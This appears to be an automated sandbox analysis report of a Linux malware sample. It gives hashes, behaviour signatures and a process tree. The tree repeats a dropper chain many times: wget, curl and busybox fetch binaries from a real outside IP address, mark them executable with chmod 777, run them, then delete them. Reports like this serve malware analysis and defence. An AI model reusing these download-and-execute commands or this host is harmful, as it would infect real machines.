US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 tcp

Files

/tmp/rVJ9W48EiBkY2qKPChyniNtNM7aSW0i2Zu

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-20 04:21

Reported

2024-11-20 04:23

Platform

ubuntu1804-amd64-20240729-en

Max time kernel

37s

Max time network

39s

Command Line

[/tmp/f064d9b048e7a9ebfafd42ad6312891eb24fe7887284fafac08ecb4d8547ec6aN]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/rVJ9W48EiBkY2qKPChyniNtNM7aSW0i2Zu /tmp/rVJ9W48EiBkY2qKPChyniNtNM7aSW0i2Zu N/A
N/A /tmp/qyCnZJ5Sqk6oxhJgUJH1ssQuiWAYm4vYnr /tmp/qyCnZJ5Sqk6oxhJgUJH1ssQuiWAYm4vYnr N/A
N/A /tmp/jMz018FmqirIthXno2QOE7F6cNd83CvXXY /tmp/jMz018FmqirIthXno2QOE7F6cNd83CvXXY N/A
N/A /tmp/iv4c8JysYuHJvbhRma1GzoMM3YnCOG2tXY /tmp/iv4c8JysYuHJvbhRma1GzoMM3YnCOG2tXY N/A
N/A /tmp/cEGEIHGdxnY0x08euKC0u5fr1kKINFRcr4 /tmp/cEGEIHGdxnY0x08euKC0u5fr1kKINFRcr4 N/A
N/A /tmp/IoK8hUPVrGlFR0Kb6yLTbZrgKBkpEvqrk4 /tmp/IoK8hUPVrGlFR0Kb6yLTbZrgKBkpEvqrk4 N/A
N/A /tmp/Es6MiN5WzwpSTugRMvTgayPgDFbBpZYYb0 /tmp/Es6MiN5WzwpSTugRMvTgayPgDFbBpZYYb0 N/A
N/A /tmp/Y5YOy13iVAQXMyJ1t6fzIDoXuyGBPtVGg2 /tmp/Y5YOy13iVAQXMyJ1t6fzIDoXuyGBPtVGg2 N/A
N/A /tmp/ew5XxM5yfsIMC4YvaJo6sPimptMp3yfV4p /tmp/ew5XxM5yfsIMC4YvaJo6sPimptMp3yfV4p N/A
N/A /tmp/FfOTFgueVMJAtK7pHeQKMDxnmcPBMbd7eP /tmp/FfOTFgueVMJAtK7pHeQKMDxnmcPBMbd7eP N/A
N/A /tmp/DmPLb6Tc3QZMkd2SyhaVS0wzI0ecuwwAfI /tmp/DmPLb6Tc3QZMkd2SyhaVS0wzI0ecuwwAfI N/A
N/A /tmp/BCDmLdkmM5D1bhEzTVoUiYVjKNEQzoRMx2 /tmp/BCDmLdkmM5D1bhEzTVoUiYVjKNEQzoRMx2 N/A
N/A /tmp/s45lvV1K474ofmcNwNK414hXZBMOCYnE5B /tmp/s45lvV1K474ofmcNwNK414hXZBMOCYnE5B N/A
N/A /tmp/f47uxlAMen7dzA4K47gsoTEIUktHUtjbtp /tmp/f47uxlAMen7dzA4K47gsoTEIUktHUtjbtp N/A
N/A /tmp/cEGEIHGdxnY0x08euKC0u5fr1kKINFRcr4 /tmp/cEGEIHGdxnY0x08euKC0u5fr1kKINFRcr4 N/A
N/A /tmp/IoK8hUPVrGlFR0Kb6yLTbZrgKBkpEvqrk4 /tmp/IoK8hUPVrGlFR0Kb6yLTbZrgKBkpEvqrk4 N/A
N/A /tmp/Es6MiN5WzwpSTugRMvTgayPgDFbBpZYYb0 /tmp/Es6MiN5WzwpSTugRMvTgayPgDFbBpZYYb0 N/A
N/A /tmp/Y5YOy13iVAQXMyJ1t6fzIDoXuyGBPtVGg2 /tmp/Y5YOy13iVAQXMyJ1t6fzIDoXuyGBPtVGg2 N/A
N/A /tmp/ew5XxM5yfsIMC4YvaJo6sPimptMp3yfV4p /tmp/ew5XxM5yfsIMC4YvaJo6sPimptMp3yfV4p N/A
N/A /tmp/FfOTFgueVMJAtK7pHeQKMDxnmcPBMbd7eP /tmp/FfOTFgueVMJAtK7pHeQKMDxnmcPBMbd7eP N/A
N/A /tmp/DmPLb6Tc3QZMkd2SyhaVS0wzI0ecuwwAfI /tmp/DmPLb6Tc3QZMkd2SyhaVS0wzI0ecuwwAfI N/A
N/A /tmp/BCDmLdkmM5D1bhEzTVoUiYVjKNEQzoRMx2 /tmp/BCDmLdkmM5D1bhEzTVoUiYVjKNEQzoRMx2 N/A
N/A /tmp/s45lvV1K474ofmcNwNK414hXZBMOCYnE5B /tmp/s45lvV1K474ofmcNwNK414hXZBMOCYnE5B N/A
N/A /tmp/f47uxlAMen7dzA4K47gsoTEIUktHUtjbtp /tmp/f47uxlAMen7dzA4K47gsoTEIUktHUtjbtp N/A
N/A /tmp/rVJ9W48EiBkY2qKPChyniNtNM7aSW0i2Zu /tmp/rVJ9W48EiBkY2qKPChyniNtNM7aSW0i2Zu N/A
N/A /tmp/qyCnZJ5Sqk6oxhJgUJH1ssQuiWAYm4vYnr /tmp/qyCnZJ5Sqk6oxhJgUJH1ssQuiWAYm4vYnr N/A
N/A /tmp/jMz018FmqirIthXno2QOE7F6cNd83CvXXY /tmp/jMz018FmqirIthXno2QOE7F6cNd83CvXXY N/A
N/A /tmp/iv4c8JysYuHJvbhRma1GzoMM3YnCOG2tXY /tmp/iv4c8JysYuHJvbhRma1GzoMM3YnCOG2tXY N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/Es6MiN5WzwpSTugRMvTgayPgDFbBpZYYb0 /usr/bin/curl N/A
File opened for modification /tmp/DmPLb6Tc3QZMkd2SyhaVS0wzI0ecuwwAfI /usr/bin/curl N/A
File opened for modification /tmp/f47uxlAMen7dzA4K47gsoTEIUktHUtjbtp /usr/bin/curl N/A
File opened for modification /tmp/jMz018FmqirIthXno2QOE7F6cNd83CvXXY /usr/bin/curl N/A
File opened for modification /tmp/cEGEIHGdxnY0x08euKC0u5fr1kKINFRcr4 /usr/bin/curl N/A
File opened for modification /tmp/IoK8hUPVrGlFR0Kb6yLTbZrgKBkpEvqrk4 /usr/bin/curl N/A
File opened for modification /tmp/FfOTFgueVMJAtK7pHeQKMDxnmcPBMbd7eP /usr/bin/curl N/A
File opened for modification /tmp/BCDmLdkmM5D1bhEzTVoUiYVjKNEQzoRMx2 /usr/bin/curl N/A
File opened for modification /tmp/FfOTFgueVMJAtK7pHeQKMDxnmcPBMbd7eP /usr/bin/curl N/A
File opened for modification /tmp/rVJ9W48EiBkY2qKPChyniNtNM7aSW0i2Zu /usr/bin/curl N/A
File opened for modification /tmp/iv4c8JysYuHJvbhRma1GzoMM3YnCOG2tXY /usr/bin/curl N/A
File opened for modification /tmp/s45lvV1K474ofmcNwNK414hXZBMOCYnE5B /usr/bin/curl N/A
File opened for modification /tmp/f47uxlAMen7dzA4K47gsoTEIUktHUtjbtp /usr/bin/curl N/A
File opened for modification /tmp/s45lvV1K474ofmcNwNK414hXZBMOCYnE5B /usr/bin/curl N/A
File opened for modification /tmp/Y5YOy13iVAQXMyJ1t6fzIDoXuyGBPtVGg2 /usr/bin/curl N/A
File opened for modification /tmp/Y5YOy13iVAQXMyJ1t6fzIDoXuyGBPtVGg2 /usr/bin/curl N/A
File opened for modification /tmp/rVJ9W48EiBkY2qKPChyniNtNM7aSW0i2Zu /usr/bin/curl N/A
File opened for modification /tmp/IoK8hUPVrGlFR0Kb6yLTbZrgKBkpEvqrk4 /usr/bin/curl N/A
File opened for modification /tmp/ew5XxM5yfsIMC4YvaJo6sPimptMp3yfV4p /usr/bin/curl N/A
File opened for modification /tmp/qyCnZJ5Sqk6oxhJgUJH1ssQuiWAYm4vYnr /usr/bin/curl N/A
File opened for modification /tmp/jMz018FmqirIthXno2QOE7F6cNd83CvXXY /usr/bin/curl N/A
File opened for modification /tmp/cEGEIHGdxnY0x08euKC0u5fr1kKINFRcr4 /usr/bin/curl N/A
File opened for modification /tmp/iv4c8JysYuHJvbhRma1GzoMM3YnCOG2tXY /usr/bin/curl N/A
File opened for modification /tmp/ew5XxM5yfsIMC4YvaJo6sPimptMp3yfV4p /usr/bin/curl N/A
File opened for modification /tmp/Es6MiN5WzwpSTugRMvTgayPgDFbBpZYYb0 /usr/bin/curl N/A
File opened for modification /tmp/DmPLb6Tc3QZMkd2SyhaVS0wzI0ecuwwAfI /usr/bin/curl N/A
File opened for modification /tmp/BCDmLdkmM5D1bhEzTVoUiYVjKNEQzoRMx2 /usr/bin/curl N/A
File opened for modification /tmp/qyCnZJ5Sqk6oxhJgUJH1ssQuiWAYm4vYnr /usr/bin/curl N/A

Processes

/tmp/f064d9b048e7a9ebfafd42ad6312891eb24fe7887284fafac08ecb4d8547ec6aN

[/tmp/f064d9b048e7a9ebfafd42ad6312891eb24fe7887284fafac08ecb4d8547ec6aN]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://216.126.231.240/bins/rVJ9W48EiBkY2qKPChyniNtNM7aSW0i2Zu]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/rVJ9W48EiBkY2qKPChyniNtNM7aSW0i2Zu]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/rVJ9W48EiBkY2qKPChyniNtNM7aSW0i2Zu]

/bin/chmod

[chmod 777 rVJ9W48EiBkY2qKPChyniNtNM7aSW0i2Zu]

/tmp/rVJ9W48EiBkY2qKPChyniNtNM7aSW0i2Zu

[./rVJ9W48EiBkY2qKPChyniNtNM7aSW0i2Zu]

/bin/rm

[rm rVJ9W48EiBkY2qKPChyniNtNM7aSW0i2Zu]

/usr/bin/wget

[wget http://216.126.231.240/bins/qyCnZJ5Sqk6oxhJgUJH1ssQuiWAYm4vYnr]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/qyCnZJ5Sqk6oxhJgUJH1ssQuiWAYm4vYnr]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/qyCnZJ5Sqk6oxhJgUJH1ssQuiWAYm4vYnr]

/bin/chmod

[chmod 777 qyCnZJ5Sqk6oxhJgUJH1ssQuiWAYm4vYnr]

/tmp/qyCnZJ5Sqk6oxhJgUJH1ssQuiWAYm4vYnr

[./qyCnZJ5Sqk6oxhJgUJH1ssQuiWAYm4vYnr]

/bin/rm

[rm qyCnZJ5Sqk6oxhJgUJH1ssQuiWAYm4vYnr]

/usr/bin/wget

[wget http://216.126.231.240/bins/jMz018FmqirIthXno2QOE7F6cNd83CvXXY]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/jMz018FmqirIthXno2QOE7F6cNd83CvXXY]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/jMz018FmqirIthXno2QOE7F6cNd83CvXXY]

/bin/chmod

[chmod 777 jMz018FmqirIthXno2QOE7F6cNd83CvXXY]

/tmp/jMz018FmqirIthXno2QOE7F6cNd83CvXXY

[./jMz018FmqirIthXno2QOE7F6cNd83CvXXY]

/bin/rm

[rm jMz018FmqirIthXno2QOE7F6cNd83CvXXY]

/usr/bin/wget

[wget http://216.126.231.240/bins/iv4c8JysYuHJvbhRma1GzoMM3YnCOG2tXY]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/iv4c8JysYuHJvbhRma1GzoMM3YnCOG2tXY]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/iv4c8JysYuHJvbhRma1GzoMM3YnCOG2tXY]

/bin/chmod

[chmod 777 iv4c8JysYuHJvbhRma1GzoMM3YnCOG2tXY]

/tmp/iv4c8JysYuHJvbhRma1GzoMM3YnCOG2tXY

[./iv4c8JysYuHJvbhRma1GzoMM3YnCOG2tXY]

/bin/rm

[rm iv4c8JysYuHJvbhRma1GzoMM3YnCOG2tXY]

/usr/bin/wget

[wget http://216.126.231.240/bins/cEGEIHGdxnY0x08euKC0u5fr1kKINFRcr4]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/cEGEIHGdxnY0x08euKC0u5fr1kKINFRcr4]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/cEGEIHGdxnY0x08euKC0u5fr1kKINFRcr4]

/bin/chmod

[chmod 777 cEGEIHGdxnY0x08euKC0u5fr1kKINFRcr4]

/tmp/cEGEIHGdxnY0x08euKC0u5fr1kKINFRcr4

[./cEGEIHGdxnY0x08euKC0u5fr1kKINFRcr4]

/bin/rm

[rm cEGEIHGdxnY0x08euKC0u5fr1kKINFRcr4]

/usr/bin/wget

[wget http://216.126.231.240/bins/IoK8hUPVrGlFR0Kb6yLTbZrgKBkpEvqrk4]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/IoK8hUPVrGlFR0Kb6yLTbZrgKBkpEvqrk4]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/IoK8hUPVrGlFR0Kb6yLTbZrgKBkpEvqrk4]

/bin/chmod

[chmod 777 IoK8hUPVrGlFR0Kb6yLTbZrgKBkpEvqrk4]

/tmp/IoK8hUPVrGlFR0Kb6yLTbZrgKBkpEvqrk4

[./IoK8hUPVrGlFR0Kb6yLTbZrgKBkpEvqrk4]

/bin/rm

[rm IoK8hUPVrGlFR0Kb6yLTbZrgKBkpEvqrk4]

/usr/bin/wget

[wget http://216.126.231.240/bins/Es6MiN5WzwpSTugRMvTgayPgDFbBpZYYb0]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/Es6MiN5WzwpSTugRMvTgayPgDFbBpZYYb0]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/Es6MiN5WzwpSTugRMvTgayPgDFbBpZYYb0]

/bin/chmod

[chmod 777 Es6MiN5WzwpSTugRMvTgayPgDFbBpZYYb0]

/tmp/Es6MiN5WzwpSTugRMvTgayPgDFbBpZYYb0

[./Es6MiN5WzwpSTugRMvTgayPgDFbBpZYYb0]

/bin/rm

[rm Es6MiN5WzwpSTugRMvTgayPgDFbBpZYYb0]

/usr/bin/wget

[wget http://216.126.231.240/bins/Y5YOy13iVAQXMyJ1t6fzIDoXuyGBPtVGg2]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/Y5YOy13iVAQXMyJ1t6fzIDoXuyGBPtVGg2]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/Y5YOy13iVAQXMyJ1t6fzIDoXuyGBPtVGg2]

/bin/chmod

[chmod 777 Y5YOy13iVAQXMyJ1t6fzIDoXuyGBPtVGg2]

/tmp/Y5YOy13iVAQXMyJ1t6fzIDoXuyGBPtVGg2

[./Y5YOy13iVAQXMyJ1t6fzIDoXuyGBPtVGg2]

/bin/rm

[rm Y5YOy13iVAQXMyJ1t6fzIDoXuyGBPtVGg2]

/usr/bin/wget

[wget http://216.126.231.240/bins/ew5XxM5yfsIMC4YvaJo6sPimptMp3yfV4p]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/ew5XxM5yfsIMC4YvaJo6sPimptMp3yfV4p]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/ew5XxM5yfsIMC4YvaJo6sPimptMp3yfV4p]

/bin/chmod

[chmod 777 ew5XxM5yfsIMC4YvaJo6sPimptMp3yfV4p]

/tmp/ew5XxM5yfsIMC4YvaJo6sPimptMp3yfV4p

[./ew5XxM5yfsIMC4YvaJo6sPimptMp3yfV4p]

/bin/rm

[rm ew5XxM5yfsIMC4YvaJo6sPimptMp3yfV4p]

/usr/bin/wget

[wget http://216.126.231.240/bins/FfOTFgueVMJAtK7pHeQKMDxnmcPBMbd7eP]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/FfOTFgueVMJAtK7pHeQKMDxnmcPBMbd7eP]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/FfOTFgueVMJAtK7pHeQKMDxnmcPBMbd7eP]

/bin/chmod

[chmod 777 FfOTFgueVMJAtK7pHeQKMDxnmcPBMbd7eP]

/tmp/FfOTFgueVMJAtK7pHeQKMDxnmcPBMbd7eP

[./FfOTFgueVMJAtK7pHeQKMDxnmcPBMbd7eP]

/bin/rm

[rm FfOTFgueVMJAtK7pHeQKMDxnmcPBMbd7eP]

/usr/bin/wget

[wget http://216.126.231.240/bins/DmPLb6Tc3QZMkd2SyhaVS0wzI0ecuwwAfI]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/DmPLb6Tc3QZMkd2SyhaVS0wzI0ecuwwAfI]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/DmPLb6Tc3QZMkd2SyhaVS0wzI0ecuwwAfI]

/bin/chmod

[chmod 777 DmPLb6Tc3QZMkd2SyhaVS0wzI0ecuwwAfI]

/tmp/DmPLb6Tc3QZMkd2SyhaVS0wzI0ecuwwAfI

[./DmPLb6Tc3QZMkd2SyhaVS0wzI0ecuwwAfI]

/bin/rm

[rm DmPLb6Tc3QZMkd2SyhaVS0wzI0ecuwwAfI]

/usr/bin/wget

[wget http://216.126.231.240/bins/BCDmLdkmM5D1bhEzTVoUiYVjKNEQzoRMx2]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/BCDmLdkmM5D1bhEzTVoUiYVjKNEQzoRMx2]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/BCDmLdkmM5D1bhEzTVoUiYVjKNEQzoRMx2]

/bin/chmod

[chmod 777 BCDmLdkmM5D1bhEzTVoUiYVjKNEQzoRMx2]

/tmp/BCDmLdkmM5D1bhEzTVoUiYVjKNEQzoRMx2

[./BCDmLdkmM5D1bhEzTVoUiYVjKNEQzoRMx2]

/bin/rm

[rm BCDmLdkmM5D1bhEzTVoUiYVjKNEQzoRMx2]

/usr/bin/wget

[wget http://216.126.231.240/bins/s45lvV1K474ofmcNwNK414hXZBMOCYnE5B]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/s45lvV1K474ofmcNwNK414hXZBMOCYnE5B]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/s45lvV1K474ofmcNwNK414hXZBMOCYnE5B]

/bin/chmod

[chmod 777 s45lvV1K474ofmcNwNK414hXZBMOCYnE5B]

/tmp/s45lvV1K474ofmcNwNK414hXZBMOCYnE5B

[./s45lvV1K474ofmcNwNK414hXZBMOCYnE5B]

/bin/rm

[rm s45lvV1K474ofmcNwNK414hXZBMOCYnE5B]

/usr/bin/wget

[wget http://216.126.231.240/bins/f47uxlAMen7dzA4K47gsoTEIUktHUtjbtp]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/f47uxlAMen7dzA4K47gsoTEIUktHUtjbtp]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/f47uxlAMen7dzA4K47gsoTEIUktHUtjbtp]

/bin/chmod

[chmod 777 f47uxlAMen7dzA4K47gsoTEIUktHUtjbtp]

/tmp/f47uxlAMen7dzA4K47gsoTEIUktHUtjbtp

[./f47uxlAMen7dzA4K47gsoTEIUktHUtjbtp]

/bin/rm

[rm f47uxlAMen7dzA4K47gsoTEIUktHUtjbtp]

/usr/bin/wget

[wget http://216.126.231.240/bins/cEGEIHGdxnY0x08euKC0u5fr1kKINFRcr4]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/cEGEIHGdxnY0x08euKC0u5fr1kKINFRcr4]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/cEGEIHGdxnY0x08euKC0u5fr1kKINFRcr4]

/bin/chmod

[chmod 777 cEGEIHGdxnY0x08euKC0u5fr1kKINFRcr4]

/tmp/cEGEIHGdxnY0x08euKC0u5fr1kKINFRcr4

[./cEGEIHGdxnY0x08euKC0u5fr1kKINFRcr4]

/bin/rm

[rm cEGEIHGdxnY0x08euKC0u5fr1kKINFRcr4]

/usr/bin/wget

[wget http://216.126.231.240/bins/IoK8hUPVrGlFR0Kb6yLTbZrgKBkpEvqrk4]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/IoK8hUPVrGlFR0Kb6yLTbZrgKBkpEvqrk4]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/IoK8hUPVrGlFR0Kb6yLTbZrgKBkpEvqrk4]

/bin/chmod

[chmod 777 IoK8hUPVrGlFR0Kb6yLTbZrgKBkpEvqrk4]

/tmp/IoK8hUPVrGlFR0Kb6yLTbZrgKBkpEvqrk4

[./IoK8hUPVrGlFR0Kb6yLTbZrgKBkpEvqrk4]

/bin/rm

[rm IoK8hUPVrGlFR0Kb6yLTbZrgKBkpEvqrk4]

/usr/bin/wget

[wget http://216.126.231.240/bins/Es6MiN5WzwpSTugRMvTgayPgDFbBpZYYb0]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/Es6MiN5WzwpSTugRMvTgayPgDFbBpZYYb0]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/Es6MiN5WzwpSTugRMvTgayPgDFbBpZYYb0]

/bin/chmod

[chmod 777 Es6MiN5WzwpSTugRMvTgayPgDFbBpZYYb0]

/tmp/Es6MiN5WzwpSTugRMvTgayPgDFbBpZYYb0

[./Es6MiN5WzwpSTugRMvTgayPgDFbBpZYYb0]

/bin/rm

[rm Es6MiN5WzwpSTugRMvTgayPgDFbBpZYYb0]

/usr/bin/wget

[wget http://216.126.231.240/bins/Y5YOy13iVAQXMyJ1t6fzIDoXuyGBPtVGg2]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/Y5YOy13iVAQXMyJ1t6fzIDoXuyGBPtVGg2]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/Y5YOy13iVAQXMyJ1t6fzIDoXuyGBPtVGg2]

/bin/chmod

[chmod 777 Y5YOy13iVAQXMyJ1t6fzIDoXuyGBPtVGg2]

/tmp/Y5YOy13iVAQXMyJ1t6fzIDoXuyGBPtVGg2

[./Y5YOy13iVAQXMyJ1t6fzIDoXuyGBPtVGg2]

/bin/rm

[rm Y5YOy13iVAQXMyJ1t6fzIDoXuyGBPtVGg2]

/usr/bin/wget

[wget http://216.126.231.240/bins/ew5XxM5yfsIMC4YvaJo6sPimptMp3yfV4p]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/ew5XxM5yfsIMC4YvaJo6sPimptMp3yfV4p]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/ew5XxM5yfsIMC4YvaJo6sPimptMp3yfV4p]

/bin/chmod

[chmod 777 ew5XxM5yfsIMC4YvaJo6sPimptMp3yfV4p]

/tmp/ew5XxM5yfsIMC4YvaJo6sPimptMp3yfV4p

[./ew5XxM5yfsIMC4YvaJo6sPimptMp3yfV4p]

/bin/rm

[rm ew5XxM5yfsIMC4YvaJo6sPimptMp3yfV4p]

/usr/bin/wget

[wget http://216.126.231.240/bins/FfOTFgueVMJAtK7pHeQKMDxnmcPBMbd7eP]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/FfOTFgueVMJAtK7pHeQKMDxnmcPBMbd7eP]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/FfOTFgueVMJAtK7pHeQKMDxnmcPBMbd7eP]

/bin/chmod

[chmod 777 FfOTFgueVMJAtK7pHeQKMDxnmcPBMbd7eP]

/tmp/FfOTFgueVMJAtK7pHeQKMDxnmcPBMbd7eP

[./FfOTFgueVMJAtK7pHeQKMDxnmcPBMbd7eP]

/bin/rm

[rm FfOTFgueVMJAtK7pHeQKMDxnmcPBMbd7eP]

/usr/bin/wget

[wget http://216.126.231.240/bins/DmPLb6Tc3QZMkd2SyhaVS0wzI0ecuwwAfI]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/DmPLb6Tc3QZMkd2SyhaVS0wzI0ecuwwAfI]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/DmPLb6Tc3QZMkd2SyhaVS0wzI0ecuwwAfI]

/bin/chmod

[chmod 777 DmPLb6Tc3QZMkd2SyhaVS0wzI0ecuwwAfI]

/tmp/DmPLb6Tc3QZMkd2SyhaVS0wzI0ecuwwAfI

[./DmPLb6Tc3QZMkd2SyhaVS0wzI0ecuwwAfI]

/bin/rm

[rm DmPLb6Tc3QZMkd2SyhaVS0wzI0ecuwwAfI]

/usr/bin/wget

[wget http://216.126.231.240/bins/BCDmLdkmM5D1bhEzTVoUiYVjKNEQzoRMx2]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/BCDmLdkmM5D1bhEzTVoUiYVjKNEQzoRMx2]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/BCDmLdkmM5D1bhEzTVoUiYVjKNEQzoRMx2]

/bin/chmod

[chmod 777 BCDmLdkmM5D1bhEzTVoUiYVjKNEQzoRMx2]

/tmp/BCDmLdkmM5D1bhEzTVoUiYVjKNEQzoRMx2

[./BCDmLdkmM5D1bhEzTVoUiYVjKNEQzoRMx2]

/bin/rm

[rm BCDmLdkmM5D1bhEzTVoUiYVjKNEQzoRMx2]

/usr/bin/wget

[wget http://216.126.231.240/bins/s45lvV1K474ofmcNwNK414hXZBMOCYnE5B]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/s45lvV1K474ofmcNwNK414hXZBMOCYnE5B]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/s45lvV1K474ofmcNwNK414hXZBMOCYnE5B]

/bin/chmod

[chmod 777 s45lvV1K474ofmcNwNK414hXZBMOCYnE5B]

/tmp/s45lvV1K474ofmcNwNK414hXZBMOCYnE5B

[./s45lvV1K474ofmcNwNK414hXZBMOCYnE5B]

/bin/rm

[rm s45lvV1K474ofmcNwNK414hXZBMOCYnE5B]

/usr/bin/wget

[wget http://216.126.231.240/bins/f47uxlAMen7dzA4K47gsoTEIUktHUtjbtp]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/f47uxlAMen7dzA4K47gsoTEIUktHUtjbtp]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/f47uxlAMen7dzA4K47gsoTEIUktHUtjbtp]

/bin/chmod

[chmod 777 f47uxlAMen7dzA4K47gsoTEIUktHUtjbtp]

/tmp/f47uxlAMen7dzA4K47gsoTEIUktHUtjbtp

[./f47uxlAMen7dzA4K47gsoTEIUktHUtjbtp]

/bin/rm

[rm f47uxlAMen7dzA4K47gsoTEIUktHUtjbtp]

/usr/bin/wget

[wget http://216.126.231.240/bins/rVJ9W48EiBkY2qKPChyniNtNM7aSW0i2Zu]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/rVJ9W48EiBkY2qKPChyniNtNM7aSW0i2Zu]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/rVJ9W48EiBkY2qKPChyniNtNM7aSW0i2Zu]

/bin/chmod

[chmod 777 rVJ9W48EiBkY2qKPChyniNtNM7aSW0i2Zu]

/tmp/rVJ9W48EiBkY2qKPChyniNtNM7aSW0i2Zu

[./rVJ9W48EiBkY2qKPChyniNtNM7aSW0i2Zu]

/bin/rm

[rm rVJ9W48EiBkY2qKPChyniNtNM7aSW0i2Zu]

/usr/bin/wget

[wget http://216.126.231.240/bins/qyCnZJ5Sqk6oxhJgUJH1ssQuiWAYm4vYnr]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/qyCnZJ5Sqk6oxhJgUJH1ssQuiWAYm4vYnr]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/qyCnZJ5Sqk6oxhJgUJH1ssQuiWAYm4vYnr]

/bin/chmod

[chmod 777 qyCnZJ5Sqk6oxhJgUJH1ssQuiWAYm4vYnr]

/tmp/qyCnZJ5Sqk6oxhJgUJH1ssQuiWAYm4vYnr

[./qyCnZJ5Sqk6oxhJgUJH1ssQuiWAYm4vYnr]

/bin/rm

[rm qyCnZJ5Sqk6oxhJgUJH1ssQuiWAYm4vYnr]

/usr/bin/wget

[wget http://216.126.231.240/bins/jMz018FmqirIthXno2QOE7F6cNd83CvXXY]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/jMz018FmqirIthXno2QOE7F6cNd83CvXXY]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/jMz018FmqirIthXno2QOE7F6cNd83CvXXY]
